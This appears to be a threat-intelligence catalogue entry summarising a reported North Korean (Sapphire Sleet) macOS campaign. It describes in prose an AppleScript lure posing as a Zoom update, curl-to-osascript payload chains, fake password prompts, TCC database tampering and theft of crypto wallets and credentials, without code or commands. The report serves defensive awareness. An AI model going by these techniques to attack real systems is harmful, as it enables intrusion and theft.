Dissecting macOS intrusion from lure to compromise

216.73.216.6

Dissecting macOS intrusion from lure to compromise

· Published 17/04/2026 08:37 · Modified 17/04/2026 10:47

Essential information

Published: 17/04/2026 08:37
Modified: 17/04/2026 10:47
Tags: 2026-04-17 applescript com.apple.cli com.google.chromes.updaters credential harvesting cryptocurrency theft icloudz macos north korea sapphire sleet services social engineering softwareupdate.app systemupdate.app tcc bypass
Related entities: 13 observables, 1 intrusion sets (apt), 19 techniques (mitre), 6 malware, 11 others

Description

Microsoft Threat Intelligence uncovered a macOS-focused cyber campaign by North Korean threat actor Sapphire Sleet utilizing social engineering to compromise systems. The attack chain begins with a malicious AppleScript file disguised as a Zoom SDK update, which executes cascading payloads through curl-to-osascript chains. The campaign deploys multiple backdoors including com.apple.cli, services, icloudz, and com.google.chromes.updaters for persistence and command execution. Credential harvesting occurs through fake system dialogs that mimic legitimate macOS password prompts. The threat actor bypasses Transparency, Consent, and Control protections by directly manipulating the TCC database, enabling extensive data exfiltration targeting cryptocurrency wallets, browser credentials, Telegram sessions, SSH keys, and Apple Notes. Operations focus on cryptocurrency, finance, and blockchain organizations with the primary objective of stealing digital assets.